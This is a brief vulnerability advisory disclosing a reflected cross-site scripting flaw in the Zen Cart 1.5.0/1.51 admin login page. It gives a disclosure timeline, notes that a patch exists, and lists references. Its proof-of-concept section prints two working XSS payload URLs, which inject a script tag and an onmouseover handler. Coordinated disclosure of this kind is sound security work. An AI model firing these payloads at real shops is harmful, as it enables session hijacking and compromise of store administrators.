Advisory:		Zen cart v1.5.0 & v1.51 Cross-Site Scripting vulnerability
Advisory ID:		SSCHADV2012-021
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Zen-cart-v150-12302011
Vendor URL:		http://www.zen-cart.com/
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

Zen cart v1.5.0 & v1.51 is prone to a Cross-Site Scripting vulnerability

==========================
PoC-Exploit
==========================

http://[target]/zen-cart-v150-full-release-12302011/admin1/login.php?'"</script><script>alert(/xss/)</script>
http://[target]/zen-cart-v150-full-release-12302011/admin1/login.php?camefrom=" onmouseover=alert(/xss/) "

==========================
Solution
==========================

A patch is available, see References.

==========================
Disclosure Timeline
==========================

08-Sep-2012 - informed Secunia via SVCRP
08-Oct-2012 - patch released

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.zen-cart.com/showthread.php?200947-XSS-Flaw-Patch
http://secunia.com/advisories/50574/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-021.txt